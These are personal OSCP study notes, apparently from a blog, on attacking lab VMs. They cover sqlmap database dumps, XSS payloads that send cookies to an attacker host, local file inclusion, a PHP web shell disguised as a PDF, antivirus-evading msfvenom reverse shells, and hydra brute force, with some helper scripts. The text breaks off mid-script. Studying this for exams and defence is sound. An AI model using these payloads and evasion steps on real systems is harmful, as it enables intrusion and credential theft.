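    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Set-Cookie": "PHPSESSID=constructedsessionid0001; path=/; Secure; HttpOnly; SameSite=Lax",
}

REQUIRED = {
    "X-Frame-Options": "page can be framed (clickjacking)",
    "X-Content-Type-Options": "browser may sniff a different MIME type",
    "Content-Security-Policy": "no restriction on where scripts load from",
    "Strict-Transport-Security": "no forced HTTPS, the session cookie can travel in clear",
}
LEAKY = ("Server", "X-Powered-By")


def audit_cookie(set_cookie):
    """Flag a Set-Cookie value whose cookie lacks the attributes that limit theft."""
    parts = [p.strip() for p in set_cookie.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    out = []
    if "httponly" not in attrs:
        out.append(f"cookie {name} lacks HttpOnly: document.cookie exposes it to injected script")
    if "secure" not in attrs:
        out.append(f"cookie {name} lacks Secure: it is sent over plain HTTP")
    if "samesite" not in attrs:
        out.append(f"cookie {name} lacks SameSite: cross-site requests carry the session")
    return out


def audit_headers(headers):
    """Return a list of findings for one HTTP response's headers (case-insensitive names)."""
    lower = {k.lower(): v for k, v in headers.items()}
    out = []
    for name, risk in REQUIRED.items():
        if name.lower() not in lower:
            out.append(f"missing {name}: {risk}")
    if lower.get("x-content-type-options", "nosniff").lower() != "nosniff":
        out.append("X-Content-Type-Options present but not 'nosniff'")
    for name in LEAKY:
        value = lower.get(name.lower(), "")
        if re.search(r"\d", value):
            out.append(f"{name} reveals software and version: {value}")
    if "set-cookie" in lower:
        out.extend(audit_cookie(lower["set-cookie"]))
    return out


def render_comment(text):
    """Output encoding for the comment box: a <script> payload becomes inert text."""
    return f'<p class="comment">{html.escape(text, quote=True)}</p>'


if __name__ == "__main__":
    for finding in audit_headers(WEAK_RESPONSE):
        print(finding)
    print(render_comment("<script>alert(1)</script>"))
```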

SQL Injection

Go to the login page

Check the SQL injection cheat sheet; search for "Pentest lab sql injection cheat sheet"
https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

Potential SQL injection position:

192.168.119.134/post.php?id=3

?id=3

Let's try sqlmap first

not allowed in the exam

sqlmap -u "192.168.119.134/post.php?id=1"
[15:04:32] [WARNING] GET parameter 'id' does not seem to be injectable

or

sqlmap -u "http://192.168.119.134/admin/edit.php?id=1" --cookie=PHPSESSID=79fi4mj2s3lq39p0fmdmnpdpd1

if the cookie is known

sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 7510=7510

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 5982 FROM (SELECT(SLEEP(5)))lOqF)

Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-9410 UNION ALL SELECT NULL,NULL,CONCAT(0x7171706a71,0x716c664c74636976635573484b575956527471614e56527a524b527a4a76687a4a78454267716675,0x7171787871),NULL-- -
---

Dump the database:

sqlmap -u "http://192.168.119.134/admin/edit.php?id=1" --cookie=PHPSESSID=79fi4mj2s3lq39p0fmdmnpdpd1 --dump
[15:24:33] [INFO] cracked password 'P4ssw0rd' for user 'admin'
Database: blog
Table: users
[1 entry]
+----+-------+---------------------------------------------+
| id | login | password |
+----+-------+---------------------------------------------+
| 1 | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+----+-------+---------------------------------------------+

+----+---------+--------------------------------------------------------------------------------------------------+---------+---------+-----------+
| id | post_id | text | title | author | published |
+----+---------+--------------------------------------------------------------------------------------------------+---------+---------+-----------+
| 1 | 2 | <script>alert("XSS")</script> | <blank> | <blank> | NULL |
| 2 | 2 | <script>location.href='http://192.168.119.132/index.php?test='+document.cookie;</script> | <blank> | <blank> | NULL |
| 3 | 3 | rt | df | df | NULL |
| 4 | 3 | <script>location.href='http://192.168.119.132/index.php?test='+document.cookie;</script> | <blank> | <blank> | NULL |
| 5 | 1 | <script>location.href='http://192.168.119.132/index.php?test='+document.cookie;</script> | <blank> | <blank> | NULL |
+----+---------+--------------------------------------------------------------------------------------------------+---------+---------+-----------+

Try the login page:

sqlmap -u "http://192.168.119.134/admin/login.php" --data="user=hello&password=23c"

Local File Inclusion

Vulnhub: https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/

Use Nikto:

nikto -h 192.168.119.135

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.119.135
+ Target Hostname: 192.168.119.135
+ Target Port: 80
+ Start Time: 2021-03-12 20:47:51 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 3472, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8725 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time: 2021-03-12 20:48:20 (GMT-5) (29 seconds)

but found:

http://192.168.119.135/index.php?page=../../../../../../../../../../etc/passwd%00

Not able to scan anything,

Create a PDF file:

%PDF-1.4
<?php
system($_GET["cmd"]);
?>

The file goes to the uploads folder; how do we know that?

http://192.168.119.135/index.php?page=uploads/shell.pdf%00&cmd=whoami

%00 tells PHP to ignore the following content

PHP reverse shell

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Add %PDF-1.4 to make it look like a PDF file
Modify the IP and port in the script

nc -nvlp 4444

Get the shell now
Next step: privilege escalation
Find a folder you have full control of

Remote File Inclusion

Create the malicious payload:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.119.132 LPORT=444 >> exploit.php

Host the file:

service apache2 stop
cd /var/www/html
python -m SimpleHTTPServer 80

This one needs the Metasploit handler to receive the connection, so maybe use php-reverse-shell for the exam

use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
set LHOST 192.168.119.132
set LPORT 4444

Other things:

Found a good blog: My journey through OSCP


OSCP Study Notes - 2021/03/11

Fuzzing

Download Vulnserver
Download Immunity Debugger


Skipped since I cannot set up Vulnserver on the host; not safe anyway

Client Side Attacks

Needs a vulnerable web browser; something like phishing

Wait for the victim to visit your site

setoolkit - social engineering attack

46->2 windows reverse_TCP meterpreter, errors again… guess my host is very secure

Java Applet Attacks

Reverse Shell

In a typical remote system access scenario, the user is the client and the target machine is the server. The user initiates a remote shell connection and the target system listens for such connections. With a reverse shell, the roles are opposite. It is the target machine that initiates the connection to the user, and the user’s computer listens for incoming connections on a specified port.

Generate a virus:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o shell1.exe

# check options
msfvenom -p windows/shell_reverse_tcp --list-options

MsfVenom - a Metasploit standalone payload generator.
-p, --payload

Anti Virus

VirusTotal: scan for viruses, test whether it passes anti-virus

Add encoding:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -e x86/shikata_ga_nai -o shell2.exe

About shikata ga nai encoder: https://www.boozallen.com/c/insight/blog/the-shikata-ga-nai-encoder.html

Embed into another binary:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/nc.exe -o shell3.exe

-x, --template

Creating the virus yourself will bring the VirusTotal detections down

Pre-exploit password attacks

Brute force attack, last resort

ncrack, medusa, hydra

wordlist:

gzip -dc /usr/share/wordlists/rockyou.txt.gz > ...

Use Kioptrix VM

hydra -v -l root -P rockyou.txt 192.168.0.22 ssh

-l login user
SSH keeps logs, so this will be detected

Got a connection reset error

Tried to connect with SSH manually, got:

Unable to negotiate with 192.168.0.22 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

Add to ~/.ssh/config:

Host 192.168.0.22
KexAlgorithms +diffie-hellman-group1-sha1
Ciphers +aes128-cbc

Add -c 1 to wait 1s between each retry:
the wait time in seconds per login attempt over all threads

Metasploit brute force

use auxiliary/scanner/ssh/ssh_login

OSCP Study Notes - 2021/03/10

TRY HARDER!!

DNS Enumeration

host command

# host -t ns zonetransfer.me
zonetransfer.me name server nsztm2.digi.ninja.
zonetransfer.me name server nsztm1.digi.ninja.

-t specifies the query type

# host -t mx zonetransfer.me
zonetransfer.me mail is handled by 10 ALT2.ASPMX.L.GOOGLE.COM.
zonetransfer.me mail is handled by 20 ASPMX2.GOOGLEMAIL.COM.
zonetransfer.me mail is handled by 0 ASPMX.L.GOOGLE.COM.
zonetransfer.me mail is handled by 20 ASPMX5.GOOGLEMAIL.COM.
zonetransfer.me mail is handled by 20 ASPMX4.GOOGLEMAIL.COM.
zonetransfer.me mail is handled by 20 ASPMX3.GOOGLEMAIL.COM.
zonetransfer.me mail is handled by 10 ALT1.ASPMX.L.GOOGLE.COM.

zonetransfer

# host -l zonetransfer.me nsztm1.digi.ninja
Using domain server:
Name: nsztm1.digi.ninja
Address: 81.4.108.41#53
Aliases:

zonetransfer.me has address 5.196.105.14
zonetransfer.me name server nsztm1.digi.ninja.
zonetransfer.me name server nsztm2.digi.ninja.
14.105.196.5.IN-ADDR.ARPA.zonetransfer.me domain name pointer www.zonetransfer.me.
asfdbbox.zonetransfer.me has address 127.0.0.1
canberra-office.zonetransfer.me has address 202.14.81.230
dc-office.zonetransfer.me has address 143.228.181.132
deadbeef.zonetransfer.me has IPv6 address dead:beaf::
email.zonetransfer.me has address 74.125.206.26
home.zonetransfer.me has address 127.0.0.1
internal.zonetransfer.me name server intns1.zonetransfer.me.
internal.zonetransfer.me name server intns2.zonetransfer.me.
intns1.zonetransfer.me has address 81.4.108.41
intns2.zonetransfer.me has address 167.88.42.94
office.zonetransfer.me has address 4.23.39.254
ipv6actnow.org.zonetransfer.me has IPv6 address 2001:67c:2e8:11::c100:1332
owa.zonetransfer.me has address 207.46.197.32
alltcpportsopen.firewall.test.zonetransfer.me has address 127.0.0.1
vpn.zonetransfer.me has address 174.36.59.154
www.zonetransfer.me has address 5.196.105.14

-l List zone: The host command performs a zone transfer of zone name and prints out the NS, PTR and address records (A/AAAA).

AXFR offers no authentication, so any client can ask a DNS server for a copy of the entire zone. This means that unless some kind of protection is introduced, an attacker can get a list of all hosts for a domain, which gives them a lot of potential attack vectors.
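Once a zone transfer succeeds, the dump is a host inventory. The following is an added Python example (not part of the original notes) that parses `host -l` output like the one above into records and sorts them into public targets, leaked internal addresses, delegated sub-zones worth a second AXFR attempt, and hostnames whose label hints at their role. The sample input is a subset of the dump shown above; the hint-label list is my own choice.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: a subset of the `host -l zonetransfer.me nsztm1.digi.ninja` output above.
SAMPLE_AXFR = """\
zonetransfer.me has address 5.196.105.14
zonetransfer.me name server nsztm1.digi.ninja.
zonetransfer.me name server nsztm2.digi.ninja.
14.105.196.5.IN-ADDR.ARPA.zonetransfer.me domain name pointer www.zonetransfer.me.
asfdbbox.zonetransfer.me has address 127.0.0.1
canberra-office.zonetransfer.me has address 202.14.81.230
deadbeef.zonetransfer.me has IPv6 address dead:beaf::
internal.zonetransfer.me name server intns1.zonetransfer.me.
intns1.zonetransfer.me has address 81.4.108.41
owa.zonetransfer.me has address 207.46.197.32
vpn.zonetransfer.me has address 174.36.59.154
www.zonetransfer.me has address 5.196.105.14
"""

# The record shapes `host -l` prints: A, AAAA, NS and PTR.
_PATTERNS = (
    ("A", re.compile(r"^(\S+) has address (\S+)$")),
    ("AAAA", re.compile(r"^(\S+) has IPv6 address (\S+)$")),
    ("NS", re.compile(r"^(\S+) name server (\S+)$")),
    ("PTR", re.compile(r"^(\S+) domain name pointer (\S+)$")),
)

# Labels that usually mark a high-value host (my list; extend to taste).
HINT_LABELS = ("vpn", "owa", "mail", "office", "internal", "intns", "dc-")


def parse_axfr(text):
    """Turn `host -l` output into (owner, type, value) tuples, trailing dots removed."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        for rtype, pat in _PATTERNS:
            m = pat.match(line)
            if m:
                records.append((m.group(1).rstrip("."), rtype, m.group(2).rstrip(".")))
                break
    return records


def classify(records, zone):
    """Sort a zone dump into what a tester does next with it:
    public      -> (name, ip) pairs to port scan
    internal    -> loopback / RFC1918 / ULA addresses that leak internal addressing
    delegations -> (subzone, nameserver) pairs to try AXFR against as well
    hints       -> owner names whose first label suggests a role (vpn, owa, ...)"""
    out = defaultdict(set)
    for owner, rtype, value in records:
        if rtype in ("A", "AAAA"):
            ip = ipaddress.ip_address(value)
            bucket = "internal" if (ip.is_loopback or ip.is_private) else "public"
            out[bucket].add((owner, value))
        elif rtype == "NS" and owner != zone:
            out["delegations"].add((owner, value))
        label = owner.split(".")[0]
        if any(h in label for h in HINT_LABELS):
            out["hints"].add(owner)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for bucket, items in classify(parse_axfr(SAMPLE_AXFR), "zonetransfer.me").items():
        print(bucket)
        for item in items:
            print("   ", item)
```

Pipe real output in with `host -l example.com ns1.example.com | python3 axfr_triage.py` after replacing `SAMPLE_AXFR` with `sys.stdin.read()`; the loopback and RFC1918 entries (asfdbbox, home, alltcpportsopen in the full dump) are the ones to note for later internal pivoting.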

dnsrecon - DNS Enumeration and Scanning Tool

dnsrecon -d zonetransfer.me -t axfr

-d domain
-t type

dnsenum

multithread script to enumerate information on a domain and to discover non-contiguous IP blocks

dnsenum zonetransfer.me

Other Enumeration

Find some Vulnhub boxes and scan them

FTP

Default Port: 21
Using Metasploitable

nmap -Pn -sS -A -p 21 192.168.119.129
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-10 14:18 EST
Nmap scan report for 192.168.119.129
Host is up (0.00021s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.119.132
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
MAC Address: 00:0C:29:7F:42:67 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Unix

-A enables OS detection, version detection, script scanning (-sC, equivalent to --script=default) and traceroute
connect to it and grab the banner

ftp 192.168.119.129
Connected to 192.168.119.129.
220 (vsFTPd 2.3.4)

Use Metasploit:

msf6 auxiliary(scanner/ftp/ftp_version) > set RHOST 192.168.119.129
RHOST => 192.168.119.129
msf6 auxiliary(scanner/ftp/ftp_version) > exploit

[+] 192.168.119.129:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.119.129:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) >
msf6 auxiliary(scanner/ftp/ftp_login) > set blank_passwords true
blank_passwords => true
msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.119.129
RHOSTS => 192.168.119.129
msf6 auxiliary(scanner/ftp/ftp_login) > set USERNAME anonyus
USERNAME => anonyus
msf6 auxiliary(scanner/ftp/ftp_login) > set username anonymous
username => anonymous
msf6 auxiliary(scanner/ftp/ftp_login) > exploit

[*] 192.168.119.129:21 - 192.168.119.129:21 - Starting FTP login sweep
[!] 192.168.119.129:21 - No active DB -- Credential data will not be saved!
[+] 192.168.119.129:21 - 192.168.119.129:21 - Login Successful: anonymous:
[*] 192.168.119.129:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use Hydra

hydra - a very fast network logon cracker which supports many different services

hydra -s 21 -C ftp-default-userpass.txt -u -f 192.168.119.129 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-10 15:03:19
[DATA] max 11 tasks per 1 server, overall 11 tasks, 11 login tries, ~1 try per task
[DATA] attacking ftp://192.168.119.129:21/
[21][ftp] host: 192.168.119.129 login: ftp password: ftp
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-10 15:03:20

-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated “login:pass” format, instead of -L/-P options
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-s port

Metasploit

searchsploit vsftpd 2.3.4 shows there is a Metasploit module

use exploit/unix/ftp/vsftpd_234_backdoor

gives a shell as root, since the backdoor is spawned by the privileged vsftpd process. Caveat: only the trojaned 2.3.4 tarball carries the backdoor (triggered by a username containing ":)"), so the banner alone does not prove the host is exploitable.

SNMP

Vulnhub: analoguepond
reference walkthrough: http://xhyumiracle.com/vulnhub-analoguepond-walkthrough-part-1/

Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. Devices that typically support SNMP include cable modems, routers, switches, servers, workstations, printers, and more.

UDP port 161

  • SNMP enumeration is a process of enumerating user accounts and devices on a target system using SNMP.
  • SNMP consists of a manager and an agent; agents are embedded on every network device, and the manager is installed on a separate computer.

sudo nmap -sU -p1-200 192.168.119.133

snmp-brute

sudo nmap -sU -p161 --script snmp-brute 192.168.119.133

PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
MAC Address: 00:0C:29:EA:20:95 (VMware)

onesixtyone

SNMP Scanner

$ onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 192.168.119.133
Scanning 1 hosts, 51 communities
192.168.119.133 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64

-c <communityfile> file with community names to try
-d debug

snmp-check

$ snmp-check 192.168.119.133
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.119.133:161 using SNMPv1 and community 'public'

[*] System information:

Host IP address : 192.168.119.133
Hostname : analoguepond
Description : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
Contact : Eric Burdon <eric@example.com>
Location : There is a house in New Orleans they call it...
Uptime snmp : 00:38:18.10
Uptime system : 00:38:07.70
System date : 2021-3-11 03:01:11.0

snmp-check - SNMP device enumerator

The community string is the default "public", so read access to the whole MIB is open to anyone who can reach UDP 161

snmpwalk

retrieve a subtree of management values using SNMP GETNEXT requests

$ snmpwalk -v 2c -c public 192.168.119.133
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (259734) 0:43:17.34
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (2) 0:00:00.02
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (260776) 0:43:27.76
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E5 03 0B 03 06 14 00 2B 00 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 25
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

-v 1|2c|3 specifies SNMP version to use
-c COMMUNITY set the community string
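To pull the useful identifiers out of a walk like the one above without reading it by hand, here is an added Python example (not from the original notes): it parses `OID = TYPE: value` lines, names the MIB-2 system-group OIDs, splits sysContact into name, email and username candidate, and decodes the hrSystemDate Hex-STRING as an SNMPv2-TC DateAndTime. The sample input is copied from the output above; the OID-to-name table is hard-coded because snmpwalk printed numeric OIDs here (no MIBs installed).

```python
import re

# Constructed sample: lines copied from the snmpwalk output above (system group + hrSystemDate).
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
iso.3.6.1.2.1.1.3.0 = Timeticks: (259734) 0:43:17.34
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E5 03 0B 03 06 14 00 2B 00 00
"""

# MIB-2 system group (1.3.6.1.2.1.1) plus HOST-RESOURCES hrSystemDate, keyed by the
# numeric form snmpwalk prints when the MIB files are not installed.
NAMED_OIDS = {
    "iso.3.6.1.2.1.1.1.0": "sysDescr",
    "iso.3.6.1.2.1.1.3.0": "sysUpTime",
    "iso.3.6.1.2.1.1.4.0": "sysContact",
    "iso.3.6.1.2.1.1.5.0": "sysName",
    "iso.3.6.1.2.1.1.6.0": "sysLocation",
    "iso.3.6.1.2.1.25.1.2.0": "hrSystemDate",
}

_LINE = re.compile(r"^(\S+) = ([A-Za-z-]+): (.*)$")
_CONTACT = re.compile(r"([^<]*?)\s*<([^>@\s]+)@([^>\s]+)>")


def parse_walk(text):
    """Map OID -> (type, value) for every `OID = TYPE: value` line; STRING values lose their quotes."""
    out = {}
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m:
            continue  # continuation lines of multi-line strings are not handled here
        oid, vtype, value = m.groups()
        if vtype == "STRING":
            value = value.strip('"')
        out[oid] = (vtype, value)
    return out


def system_info(walk):
    """Pull the named system-group values out of a parsed walk."""
    return {name: walk[oid][1] for oid, name in NAMED_OIDS.items() if oid in walk}


def contact_identities(contact):
    """Split 'Eric Burdon <eric@example.com>' into (name, email, local part).
    The local part is the first username worth trying against ssh."""
    m = _CONTACT.search(contact)
    if not m:
        return contact.strip(), None, None
    name, local, domain = m.groups()
    return name.strip(), f"{local}@{domain}", local


def decode_date_and_time(hex_string):
    """Decode an SNMPv2-TC DateAndTime octet string as snmpwalk prints it (Hex-STRING):
    year(2 octets) month day hour minute second deciseconds [utc-sign utc-hours utc-minutes]."""
    b = bytes.fromhex(hex_string.replace(" ", ""))
    if len(b) not in (8, 11):
        raise ValueError(f"DateAndTime is 8 or 11 octets, got {len(b)}")
    year = (b[0] << 8) | b[1]
    stamp = f"{year:04d}-{b[2]:02d}-{b[3]:02d} {b[4]:02d}:{b[5]:02d}:{b[6]:02d}.{b[7]}"
    if len(b) == 11:
        stamp += f" {chr(b[8])}{b[9]:02d}:{b[10]:02d}"
    return stamp


def triage(text=SAMPLE_WALK):
    """Everything worth writing down from a walk, in one dict."""
    info = system_info(parse_walk(text))
    name, email, user = contact_identities(info.get("sysContact", ""))
    return {
        "hostname": info.get("sysName"),
        "kernel": info["sysDescr"].split()[2] if "sysDescr" in info else None,
        "contact_name": name,
        "contact_email": email,
        "username_candidate": user,
        "location_hint": info.get("sysLocation"),
        "system_date": decode_date_and_time(info["hrSystemDate"]) if "hrSystemDate" in info else None,
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key:19} {value}")
```

The decoded hrSystemDate (2021-03-11 03:06:20 +00:00) lines up with the snmp-check run a few minutes earlier, which is a quick sanity check that the parse is right; the kernel string from sysDescr is what feeds searchsploit later.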
eric (from sysContact) is a likely username
"There is a house in New Orleans they call it..." (sysLocation) is a lyric; google it:

There is a house in New Orleans
They call the Rising Sun,

suppose the password comes from it; try these:

therisingsun
risingsun
rising sun
the rising sun
houseoftherisingsun
house of the rising sun

Use John to generate password candidates

# john - a tool to find weak passwords of your users
john --wordlist=passlist --rules --stdout > passcandi

--rules[=SECTION[,..]] enable word mangling rules
--stdout[=LENGTH] just output candidate passwords [cut at LENGTH]
redirect the candidates to a file (passlist holds the seed phrases above, passcandi receives the mangled output)
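What `john --rules` does, written out so the rule set is visible: an added Python example (not the notes' own script, and not john's actual rule engine) that takes seed phrases from the lyric and applies a few john-style mangling rules (joiners, case, leet, suffixes). The seed list, leet table and suffix list are my choices; the output contains the six guesses above and the password that worked.

```python
# Seed phrases built from the sysLocation lyric, as in the notes above (my selection).
SEEDS = [
    "the rising sun",
    "rising sun",
    "house of the rising sun",
    "new orleans",
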